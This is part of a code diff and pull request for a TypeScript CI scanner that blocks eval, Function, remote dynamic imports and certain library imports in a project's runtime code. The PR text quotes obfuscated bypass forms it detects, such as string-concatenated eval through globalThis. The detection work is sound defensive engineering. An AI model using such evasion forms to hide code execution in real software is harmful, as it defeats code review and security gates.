+  while (token !== ts.SyntaxKind.EndOfFileToken) {
+    if (token === ts.SyntaxKind.SingleLineCommentTrivia) {
+      const tokenText = scanner.getTokenText();
+      if (re.test(tokenText)) {
+        const start = scanner.getTokenStart();
+        const { line } = sourceFile.getLineAndCharacterOfPosition(start);
+        exempted.add(line);
+      }
+    }
+    token = scanner.scan();
+  }
+  return exempted;
+}
+
+// --- Dynamic-import-specifier classification --------------------------
+
+/**
+ * Classification of the argument to a `import(specifier)` call.
+ *
+ * - `static-local-package`: a string literal that is unambiguously a
+ *   LOCAL module reference — either a relative path (`./x`, `../x`) or
+ *   a bare npm-style package specifier with no URL scheme, no
+ *   protocol-relative prefix, and no absolute filesystem path. These
+ *   resolve at bundle time and never inject runtime-external code.
+ *
+ * - `static-remote-url`: every other static-string form, including:
+ *     * `http:` / `https:` URLs
+ *     * protocol-relative (`//cdn.example/x.js`)
+ *     * any other URL scheme — `data:`, `blob:`, `file:`, `node:`,
+ *       `chrome-extension:`, etc.
+ *     * absolute filesystem paths (`/abs/path`)
+ *   The PUL-Q007 statement explicitly bans "any equivalent mechanism
+ *   that would execute code not present in the published bundle." A
+ *   `data:` / `blob:` literal executes runtime-supplied code; a
+ *   `file:` literal pulls code from outside the bundle; `node:`
+ *   dynamic imports don't belong in browser-targeted runtime. All are
+ *   the same class of hazard as an `http(s):` literal.
+ *
+ * - `non-static`: a template literal with substitutions, an
+ *   identifier read, a property access, a computed expression, etc.
+ *   Classified as non-static even if today's value happens to be
+ *   local; PUL-Q007 treats this as forbidden because the surface
+ *   creates a surprise execution path.
+ */
+export type ImportSpecifierKind = 'static-local-package' | 'static-remote-url' | 'non-static';
+
+// Bare-package-specifier predicate. Accepts:
+//   - `pkg`
+//   - `pkg/subpath`
+//   - `@scope/pkg`
+//   - `@scope/pkg/subpath`
+// Rejects: leading `/`, scheme prefixes (`data:`, `node:`, `https:`),
+// protocol-relative `//`, whitespace, query/hash characters. Local
+// relative paths (`./`, `../`) are handled separately above.
+const BARE_PACKAGE_RE =
+  /^(?:@[a-z0-9][a-z0-9._-]*\/)?[a-z0-9][a-z0-9._-]*(?:\/[a-z0-9][a-z0-9._\-/]*)?$/i;
+
+function classifyStaticSpecifierString(value: string): ImportSpecifierKind {
+  if (value === '') return 'static-remote-url';
+  if (value.startsWith('./') || value.startsWith('../')) return 'static-local-package';
+  if (value.startsWith('/')) return 'static-remote-url'; // catches '//cdn/...' and '/abs/path'
+  // Any URL scheme — `http:`, `https:`, `data:`, `blob:`, `file:`,
+  // `node:`, etc. The TS scheme grammar is `[a-zA-Z][a-zA-Z0-9+.-]*:`.
+  if (/^[a-z][a-z0-9+.-]*:/i.test(value)) return 'static-remote-url';
+  if (BARE_PACKAGE_RE.test(value)) return 'static-local-package';
+  return 'static-remote-url';
+}
+
+export function classifyImportSpecifier(arg: ts.Expression): ImportSpecifierKind {
+  const inner = unwrap(arg);
+  if (ts.isStringLiteral(inner)) {
+    return classifyStaticSpecifierString(inner.text);
+  }
+  // Template literals with NO substitutions are technically a static
+  // string; classify them by their cooked value the same way.
+  if (ts.isNoSubstitutionTemplateLiteral(inner)) {
+    return classifyStaticSpecifierString(inner.text);
+  }
+  return 'non-static';
+}
+
+/**
+ * True when the call expression is a runtime-value dynamic `import(...)`.
+ * `ts.isCallExpression(n) && n.expression.kind === ts.SyntaxKind.ImportKeyword`.
+ * Type-position `import('./mod').T` is an `ImportTypeNode`, NOT a
+ * `CallExpression`, and is handled by `isInTypePosition`.
+ */
+export function isDynamicImportCall(node: ts.Node): node is ts.CallExpression {
+  return ts.isCallExpression(node) && node.expression.kind === ts.SyntaxKind.ImportKeyword;
+}
+
+// --- Access-path resolution (shared between Q007 and A002) ------------
+
+/**
+ * Recognised global wrappers that can carry forbidden names as their
+ * own properties: `globalThis.eval`, `window.Audio`, `self.Function`,
+ * etc. Limited to these four names so an unrelated object that happens
+ * to expose a forbidden property is not flagged.
+ */
+export const GLOBAL_WRAPPERS: ReadonlySet<string> = new Set([
+  'globalThis',
+  'window',
+  'self',
+  'global',
+]);
+
+/**
+ * Resolve `expr` to a list of access-path segments anchored on the
+ * outermost identifier (or `import.meta`). Wrappers (parentheses /
+ * `as` / `!` / `satisfies`) are stripped via `unwrap`. Computed bracket
+ * access with a non-literal subscript bails out — it cannot be
+ * statically classified — and returns `null`.
+ *
+ * `getAccessPath(globalThis.window.Audio)` → `['globalThis', 'window', 'Audio']`
+ * `getAccessPath(obj['foo'])` (with literal subscript) → `['obj', 'foo']`
+ * `getAccessPath(obj[k])` (computed subscript) → `null`
+ */
+export function getAccessPath(expr: ts.Expression): readonly string[] | null {
+  const parts: string[] = [];
+  let current: ts.Expression = expr;
+  while (true) {
+    current = unwrap(current);
+    if (ts.isPropertyAccessExpression(current)) {
+      parts.unshift(current.name.text);
+      current = current.expression;
+    } else if (ts.isElementAccessExpression(current)) {
+      const arg = unwrap(current.argumentExpression);
+      if (ts.isStringLiteralLike(arg)) {
+        parts.unshift(arg.text);
+        current = current.expression;
+      } else {
+        return null;
+      }
+    } else if (ts.isIdentifier(current)) {
+      parts.unshift(current.text);
+      return parts;
+    } else if (ts.isMetaProperty(current)) {
+      parts.unshift('import.meta');
+      return parts;
+    } else {
+      return null;
+    }
+  }
+}
+
+/**
+ * True when `path` resolves to `target` once any leading recognised
+ * global-wrapper segments are stripped. Used by Q007 and A002 to
+ * detect both bare (`eval`, `Audio`) and global-wrapped
+ * (`globalThis.eval`, `window.Audio`, `self.HTMLAudioElement`) forms
+ * with one helper.
+ *
+ * `pathResolvesTo(['eval'], 'eval')` → true
+ * `pathResolvesTo(['globalThis', 'window', 'Audio'], 'Audio')` → true
+ * `pathResolvesTo(['obj', 'Audio'], 'Audio')` → false
+ *   (root `obj` is not a recognised global wrapper)
+ */
+export function pathResolvesTo(path: readonly string[], target: string): boolean {
+  let start = 0;
+  while (start < path.length && GLOBAL_WRAPPERS.has(path[start] ?? '')) {
+    start += 1;
+  }
+  const tail = path.slice(start);
+  return tail.length === 1 && tail[0] === target;
+}
+
+/**
+ * True when `expr` is a computed member access (`<obj>[<expr>]` or
+ * `<obj>.<...>[<expr>]`) whose root identifier — after walking back
+ * through static property/literal-element accesses — is a recognised
+ * global wrapper. Used by Q007 / A002 to flag potentially-evasive
+ * forms like `globalThis['ev' + 'al']('x')` or
+ * `window['Aud' + 'io']('clip')` that hide a forbidden identifier
+ * behind a non-literal subscript.
+ *
+ * Strictly conservative: any computed segment in the chain whose
+ * subscript is not a string-literal causes the function to return
+ * `true` only when the root identifier is a global wrapper. Computed
+ * access on a non-global root (`obj[k]`) is NOT flagged — the policies
+ * intentionally allow arbitrary indexing on non-global locals.
+ */
+export function isComputedGlobalWrapperAccess(expr: ts.Expression): boolean {
+  let current: ts.Expression = unwrap(expr);
+  let foundComputed = false;
+  while (true) {
+    current = unwrap(current);
+    if (ts.isPropertyAccessExpression(current)) {
+      current = current.expression;
+      continue;
+    }
+    if (ts.isElementAccessExpression(current)) {
+      const arg = unwrap(current.argumentExpression);
+      if (!ts.isStringLiteralLike(arg)) {
+        foundComputed = true;
+      }
+      current = current.expression;
+      continue;
+    }
+    break;
+  }
+  if (!foundComputed) return false;
+  return ts.isIdentifier(current) && GLOBAL_WRAPPERS.has(current.text);
+}
+
+// --- Import-ban matcher (A001..A004, A006) ----------------------------
+
+/**
+ * A single import-ban rule.
+ *
+ * `specifiers` is the exact set of forbidden module specifiers, with
+ * a trailing `/` matching every subpath: `'gsap/'` would match
+ * `'gsap/Draggable'`, `'gsap/all'`, etc. The bare specifier
+ * (`'gsap'`) is matched literally. Use both forms together when the
+ * package and its subpaths should all be forbidden.
+ *
+ * `boundaries` is the optional escape-hatch list: files inside these
+ * relative paths (matched by exact equality OR `startsWith(prefix +
+ * '/')` for directory boundaries) are allowed to import the
+ * specifiers. For PUL-A001 the boundary is `src/runtime/timeline.ts`
+ * — the adapter module.
+ *
+ * `allowTag` is the line-comment marker used to opt out a single
+ * line (e.g., `PUL-A001-allow`). Empty rationales are rejected by
+ * `collectLineExemptions`.
+ */
+export interface ImportBanRule {
+  readonly label: string; // appears on findings
+  readonly specifiers: readonly string[]; // exact specifiers; '<pkg>/' = subpath wildcard
+  readonly boundaries: readonly string[]; // files / dirs that may import (repo-relative)
+  readonly allowTag: string;
+}
+
+/**
+ * True when `specifier` matches any entry in `specifiers`. A trailing
+ * slash in a rule entry (`'gsap/'`) is a directory wildcard matching
+ * every `gsap/...` subpath.
+ */
+export function specifierMatches(specifier: string, specifiers: readonly string[]): boolean {
+  for (const entry of specifiers) {
+    if (entry.endsWith('/')) {
+      if (specifier.startsWith(entry)) return true;
+    } else if (specifier === entry) {
+      return true;
+    }
+  }
+  return false;
+}
+
+/**
+ * True when `filePath` falls inside the rule's `boundaries`
+ * escape-hatch list. A boundary may be a single file path
+ * (`src/runtime/timeline.ts`) or a directory prefix
+ * (`src/runtime/` → matches every file under `src/runtime/`).
+ *
+ * Accepts either an absolute path or a repo-relative path. The
+ * per-policy runtime-tree scans in this directory build `SourceFile`s
+ * with repo-relative names (so the diagnostic shows
+ * `src/runtime/x.ts` instead of `/home/user/.../src/runtime/x.ts`),
+ * while the unit-test exercises pass absolute paths through
+ * `join(SRC_ROOT, ...)`. Normalising both shapes here keeps the
+ * `boundaries` contract working for callers that follow either
+ * pattern.
+ */
+export function isInBoundary(filePath: string, boundaries: readonly string[]): boolean {
+  const rel = isAbsolute(filePath) ? relative(REPO_ROOT, filePath) : filePath;
+  for (const b of boundaries) {
+    if (b.endsWith('/')) {
+      if (rel === b.slice(0, -1) || rel.startsWith(b)) return true;
+    } else if (rel === b) {
+      return true;
+    }
+  }
+  return false;
+}
+
+/**
+ * Scan `source` for static and dynamic imports whose specifier matches
+ * the rule's `specifiers`. Returns findings in source order. Does not
+ * check the line-exemption set — the caller decides how to combine
+ * exemption with the rule (some rules want exemptions per-policy, not
+ * shared with other policies in the same file).
+ *
+ * Both `import 'gsap'` and `import('gsap')` are flagged. Type-only
+ * imports (`import type X from 'gsap'`) are also flagged: an
+ * `ImportDeclaration` with `importClause.isTypeOnly === true` still
+ * surfaces the library specifier to the scene module and gives an
+ * authoring shortcut around the encapsulation boundary; the
+ * preflights name this explicitly.
+ */
+export function scanImportSpecifiers(
+  sourceFile: ts.SourceFile,
+  rule: ImportBanRule,
+  exemptedLines: Set<number>,
+): SourceFinding[] {
+  const findings: SourceFinding[] = [];
+  const file = sourceFile.fileName;
+  // A file inside the rule's escape-hatch boundary list is allowed
+  // to import the forbidden specifiers — that is the entire point of
+  // the boundary concept (e.g., `src/runtime/timeline.ts` is PUL-A001's
+  // boundary). Return an empty findings list without walking the file.
+  // Per-policy tests in this repo all set `boundaries: []` and rely on
+  // file-scope exclusion instead, but the shared helper has to honour
+  // its own advertised contract for any future caller that supplies a
+  // boundary — otherwise the boundary field is documentation that does
+  // not behave the way the docs claim.
+  if (isInBoundary(file, rule.boundaries)) {
+    return findings;
+  }
+  const recordIfMatch = (node: ts.Node, specifier: string, suffix: string): void => {
+    if (!specifierMatches(specifier, rule.specifiers)) return;
+    const start = node.getStart(sourceFile);
+    const { line } = sourceFile.getLineAndCharacterOfPosition(start);
+    if (exemptedLines.has(line)) return;
+    findings.push({
+      file,
+      line: line + 1,
+      text: lineText(sourceFile, line).trim(),
+      label: `${rule.label} ${suffix}`,
+    });
+  };
+
+  const visit = (node: ts.Node): void => {
+    // Static `import ... from 'x'`
+    if (ts.isImportDeclaration(node)) {
+      const spec = node.moduleSpecifier;
+      if (ts.isStringLiteral(spec)) {
+        const kind = node.importClause?.isTypeOnly ? '(type-only import)' : '(static import)';
+        recordIfMatch(node, spec.text, kind);
+      }
+    }
+    // `import x = require('y')` — uncommon in ESM but covered.
+    if (ts.isImportEqualsDeclaration(node) && ts.isExternalModuleReference(node.moduleReference)) {
+      const expr = node.moduleReference.expression;
+      if (ts.isStringLiteral(expr)) {
+        recordIfMatch(node, expr.text, '(import equals require)');
+      }
+    }
+    // `export ... from 'x'` and `export * from 'x'`
+    if (
+      ts.isExportDeclaration(node) &&
+      node.moduleSpecifier &&
+      ts.isStringLiteral(node.moduleSpecifier)
+    ) {
+      recordIfMatch(node, node.moduleSpecifier.text, '(re-export)');
+    }
+    // Dynamic `import('x')` — value position only; type-position
+    // `import('./mod').Type` is an ImportTypeNode handled by
+    // `isInTypePosition`.
+    if (isDynamicImportCall(node) && !isInTypePosition(node)) {
+      const arg = node.arguments[0];
+      if (arg) {
+        const kind = classifyImportSpecifier(arg);
+        if (kind === 'static-local-package') {
+          const inner = unwrap(arg);
+          // `unwrap` and `isStringLiteralLike` already validated above.
+          if (ts.isStringLiteralLike(inner)) {
+            recordIfMatch(node, inner.text, '(dynamic import)');
+          }
+        }
+        // Non-static and remote-url specifiers are not import-ban
+        // matches — they are PUL-Q007's concern. Don't double-count.
+      }
+    }
+    ts.forEachChild(node, visit);
+  };
+  visit(sourceFile);
+  return findings;
+}


### PR DESCRIPTION
## Summary

Bundles seven Wave-0 runtime architectural policies (issues #46, #50-#55) as Vitest source-policy gates that scan `src/**/*.ts` on every `pnpm test` / CI run. All seven share one enforcement shape — "the runtime / scenes / core SHALL NOT use or import X" — so they share one scanner (`tests/runtime/source-policy.ts`: file walker, AST helpers, line-scoped exemption parser, import classifier, import-ban matcher, access-path resolver, computed-global-wrapper bypass detector). Each per-policy test file adds one rule row plus self-tests. The codebase is already compliant — every gate runs against the live source tree and reports zero findings. Three pre-push codex review cycles (cap-3, all-fixed) refined the gates against bypass shapes: non-http URL schemes in dynamic imports, global-wrapper audio constructors, `document.createElement('audio')`, `CompositionManifest` alias imports, untyped named composition exports, computed-subscript global access on `eval` / `Function` / `Audio` / `HTMLAudioElement`, and the import-ban `boundaries` escape hatch.

## Requirement UIDs

- `PUL-Q007`
- `PUL-A001`
- `PUL-A002`
- `PUL-A003`
- `PUL-A004`
- `PUL-A005`
- `PUL-A006`

## Related Issues

Closes #46
Closes #50
Closes #51
Closes #52
Closes #53
Closes #54
Closes #55

## ADR Impact

- No ADR required

## Changes

- Shared scanner module `tests/runtime/source-policy.ts` (file walker, AST helpers, line-scoped exemption parser, import classifier, import-ban matcher, access-path resolver, computed-global-wrapper bypass detector, `boundaries` escape-hatch contract).
- Seven per-policy test files under `tests/runtime/policy-*.test.ts` — Q007 (no eval / Function / dynamic remote import), A001 (no scene-side gsap import), A002 (no scene-side howler import + no HTMLAudioElement / Audio / `document.createElement('audio')` construction), A003 (no runtime-core PixiJS / Three.js / Phaser), A004 (no runtime-core Remotion), A005 (declarative composition shape), A006 (no runtime-core reveal.js / Spectacle).
- Two Codex-preflight design notes (`docs/design/pul-q007-runtime-code-execution-preflight.md`, `docs/design/pul-a001-timeline-library-encapsulation-preflight.md`) plus one cluster-level note (`docs/design/pul-a002-a006-import-bans-preflight.md`) documenting how A002..A006 inherit the A001 shape; `docs/design/README.md` updated with the index entries.
- Line-scoped `// PUL-<UID>-allow: <reason>` exemption convention honoured by every gate; empty / whitespace-only / hidden-in-string rationales rejected.
- Changelog fragment at `changelog.d/46.added.md`.
- Bypass-defense detection added across three review cycles: dynamic-import classifier rejects non-http URL schemes (`data:`, `blob:`, `file:`, `node:`, `chrome-extension:`, absolute paths); A002 catches `new window.Audio()`, `globalThis.HTMLAudioElement()`, `document.createElement('audio')` and wrapped variants; A005 tracks `CompositionManifest as X` import aliases and validates untyped named composition exports + `export default` bypass; computed-subscript global-wrapper access (`globalThis['ev' + 'al']('payload')`) is conservatively flagged for Q007 and A002.

## Test Plan

- [x] Unit tests pass (`pnpm test`)
- [x] `pnpm lint`, `pnpm typecheck`, `pre-commit run --all-files` all pass
- [x] No coverage regression

Every gate ships with: (a) scanner self-tests for positive forms, false-positive defenses (lookalikes, type-position references, primitive literals, comments / strings), wrapper unwrapping, exemption rules (real marker honoured; empty / hidden-in-string / different-line rejected), and reporting (file path + 1-based line + label); (b) a runtime-tree assertion that runs the scanner over `src/` (or the policy's specific scope) and asserts an empty findings list. The complete suite is 1323 tests green. The repo is already compliant; the gates trip CI on any future violation.

## Traceability

- IMPLEMENTS: PUL-Q007 ← tests/runtime/policy-q007-remote-code-execution.test.ts, PUL-A001 ← tests/runtime/policy-a001-timeline-encapsulation.test.ts, PUL-A002 ← tests/runtime/policy-a002-audio-encapsulation.test.ts, PUL-A003 ← tests/runtime/policy-a003-rendering-libraries.test.ts, PUL-A004 ← tests/runtime/policy-a004-export-pipeline.test.ts, PUL-A005 ← tests/runtime/policy-a005-declarative-composition.test.ts, PUL-A006 ← tests/runtime/policy-a006-slide-frameworks.test.ts
- TESTS: PUL-Q007 ← tests/runtime/policy-q007-remote-code-execution.test.ts (61 cases), PUL-A001 ← tests/runtime/policy-a001-timeline-encapsulation.test.ts (28 cases), PUL-A002 ← tests/runtime/policy-a002-audio-encapsulation.test.ts (40 cases), PUL-A003 ← tests/runtime/policy-a003-rendering-libraries.test.ts (15 cases), PUL-A004 ← tests/runtime/policy-a004-export-pipeline.test.ts (11 cases), PUL-A005 ← tests/runtime/policy-a005-declarative-composition.test.ts (38 cases), PUL-A006 ← tests/runtime/policy-a006-slide-frameworks.test.ts (13 cases)

